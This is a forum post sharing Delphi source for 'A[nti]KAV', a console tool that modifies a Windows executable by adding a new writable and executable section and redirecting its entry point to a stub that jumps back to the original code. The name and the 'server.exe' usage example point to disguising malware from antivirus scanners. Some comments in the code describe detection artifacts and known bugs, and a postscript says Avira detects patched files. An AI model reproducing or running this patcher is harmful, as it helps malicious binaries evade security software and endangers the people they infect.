
(delphi) AKAV

Publicado: 23 Dic 2008, 00:26
por diablo10124
autor: ErazerZ


program AKAV;

{$APPTYPE CONSOLE}

uses
  Windows;

// AddSection opens the PE file FileName, writes one extra section header
// after the last existing one, repoints AddressOfEntryPoint at the new
// section, and appends a stub that jumps to the original entry point.
//
// Parameters:
//   FileName    - path of the executable that is modified in place.
//   SectionName - name for the new section; '.EDI' is used when it is empty.
// Returns True only when every read and write transferred the expected
// number of bytes; the handle is closed on every path.
//
// Artifacts visible in a file modified by this routine (useful for triage
// and detection):
//   - NumberOfSections is one higher and the last section header has
//     Characteristics $E0000020 (code, executable, readable and writable)
//     and VirtualSize $200.
//   - AddressOfEntryPoint equals the VirtualAddress of that last section.
//   - The section data starts with B8 <imm32> FF E0, where <imm32> is the
//     original entry point as an absolute address (ImageBase + RVA).
function AddSection(FileName: String; SectionName: String): Boolean;
const
  // Entry stub; the four zero bytes are overwritten below with the
  // original entry point before the stub is written to the file.
  SectionCode: Array[0..6] of Byte = (
    $B8, $00, $00, $00, $00,   // MOV EAX, $00000000
    $FF, $E0);                 // JMP EAX
var
  i: ShortInt;
  hFile: THandle;
  DosHeader: TImageDosHeader;
  NtHeaders: TImageNtHeaders;
  SectionHeader, NewSection: TImageSectionHeader;
  dwOldEntryPoint, dwReadBytes, dwWrittenBytes: DWORD;
begin
  Result := False;
  // Open the existing file with full access for reading and in-place writing.
  hFile := CreateFile(PChar(FileName), GENERIC_ALL, FILE_SHARE_READ or FILE_SHARE_WRITE, nil, OPEN_EXISTING, 0, 0);
  // NOTE(review): CreateFile reports failure with INVALID_HANDLE_VALUE, not 0,
  // so this comparison does not catch a failed open.
  if hFile = 0 then
  begin
    CloseHandle(hFile);
    Exit;
  end;
  // Read the DOS header from offset 0; only the byte count is checked,
  // the header signature is not.
  SetFilePointer(hFile, 0, nil, FILE_BEGIN);
  ReadFile(hFile, DosHeader, sizeof(DosHeader), dwReadBytes, nil);
  if dwReadBytes = sizeof(DosHeader) then
  begin
    // Read the NT headers at the offset given by _lfanew (again without a
    // signature check).
    SetFilePointer(hFile, DosHeader._lfanew, nil, FILE_BEGIN);
    ReadFile(hFile, NtHeaders, sizeof(NtHeaders), dwReadBytes, nil);
    if dwReadBytes = sizeof(NtHeaders) then
    begin
      // Skip forward from the current position to the last section header.
      // Assumes the section table starts directly after the
      // TImageNtHeaders record that was just read - TODO confirm.
      SetFilePointer(hFile, sizeof(SectionHeader) * (NtHeaders.FileHeader.NumberOfSections -1), nil, FILE_CURRENT);
      ReadFile(hFile, SectionHeader, sizeof(SectionHeader), dwReadBytes, nil);
      if dwReadBytes = sizeof(SectionHeader) then
      begin
        // Build the new section header. NewSection is a local record; only
        // the fields assigned below are given a value here.
        if SectionName = '' then
          SectionName := '.EDI';
        // Copies eight characters into the 8-byte name field regardless of
        // the actual length of SectionName.
        for i := 0 to 7 do
          NewSection.Name[i] := Byte(SectionName[i +1]);
        // Place the section at the current end of the image in memory.
        NewSection.VirtualAddress := NtHeaders.OptionalHeader.SizeOfImage;
        NewSection.Misc.VirtualSize := $200;
        // Distance from SizeOfImage up to the next multiple of FileAlignment
        // (one full FileAlignment when SizeOfImage is already a multiple).
        NewSection.SizeOfRawData := (NewSection.VirtualAddress div NtHeaders.OptionalHeader.FileAlignment +1) *
                                     NtHeaders.OptionalHeader.FileAlignment - NtHeaders.OptionalHeader.SizeOfImage;
        // Raw data is declared to start where the last section's raw data ends.
        NewSection.PointerToRawData := SectionHeader.SizeOfRawData + SectionHeader.PointerToRawData;
        // $E0000020 = contains code ($20) + execute ($20000000) +
        // read ($40000000) + write ($80000000).
        NewSection.Characteristics := $E0000020;
        Inc(NtHeaders.FileHeader.NumberOfSections);

        // The file pointer is just past the last section header, so the new
        // header is written into the next 40-byte slot of the section table.
        // Nothing here checks that the slot is unused.
        WriteFile(hFile, NewSection, sizeof(NewSection), dwWrittenBytes, nil);
        if dwWrittenBytes = sizeof(NewSection) then
        begin
          // Remember the original entry point as an absolute address
          // (RVA + ImageBase), then point the entry point at the new section.
          dwOldEntryPoint := NtHeaders.OptionalHeader.AddressOfEntryPoint + NtHeaders.OptionalHeader.ImageBase;
          NtHeaders.OptionalHeader.AddressOfEntryPoint := NewSection.VirtualAddress;
          // Store that address in the MOV EAX immediate (byte offset 1 of
          // SectionCode), writing through a pointer into the typed constant.
          PDWORD(DWORD(@SectionCode) +1)^ := dwOldEntryPoint;
          // Grow SizeOfImage by the new section's VirtualSize and write the
          // updated NT headers back in place.
          NtHeaders.OptionalHeader.SizeOfImage := NtHeaders.OptionalHeader.SizeOfImage + NewSection.Misc.VirtualSize;
          SetFilePointer(hFile, DosHeader._lfanew, nil, FILE_BEGIN);
          WriteFile(hFile, NtHeaders, sizeof(NtHeaders), dwWrittenBytes, nil);
          if dwWrittenBytes = sizeof(NtHeaders) then
          begin
            // Append the section data at the end of the file. $200 bytes are
            // written starting at SectionCode, which is only 7 bytes long, so
            // the bytes after the stub come from whatever follows the
            // constant in this program's memory.
            SetFilePointer(hFile, GetFileSize(hFile, nil), nil, FILE_BEGIN);
            WriteFile(hFile, SectionCode, NewSection.Misc.VirtualSize, dwWrittenBytes, nil);
            if dwWrittenBytes = NewSection.Misc.VirtualSize then
            begin
              CloseHandle(hFile);
              Result := True;
            end else
              CloseHandle(hFile);
          end else
            CloseHandle(hFile);
        end else
          CloseHandle(hFile);
      end else
        CloseHandle(hFile);
    end else
      CloseHandle(hFile);
  end else
    CloseHandle(hFile);
end;

// Program entry: print the banner, then either show the usage text (no
// first argument) or run AddSection on the given file and report the result.
begin
  // Banner
  WriteLn;
  WriteLn('A[nti]KAV by ErazerZ');
  WriteLn('5th January 2006');
  WriteLn('Web: http://www.gateofgod.com');
  WriteLn('E-Mail: [email protected]');
  WriteLn;

  if ParamStr(1) = '' then
  begin
    // No target file given: show how the tool is invoked.
    WriteLn('Usage:' + #9#9 + 'AKAV.exe <your Application''s path> <your Section Name>');
    WriteLn('Example:' + #9 + 'AKAV.exe "c:\server.exe" ".ErazerZ"');
  end
  else
  begin
    // ParamStr(1) is the file to modify, ParamStr(2) the optional section name.
    if AddSection(ParamStr(1), ParamStr(2)) then
      WriteLn('File is patched!')
    else
      WriteLn('Error while patching!');
  end;
end.
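PD: el AVIRA detecta cualquier archivo parcheado con este método (el parche deja el punto de entrada apuntando a una última sección nueva, marcada como código ejecutable y escribible).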

Re: (delphi) AKAV

Publicado: 15 Dic 2009, 20:12
por Cyber-Sec
What akav?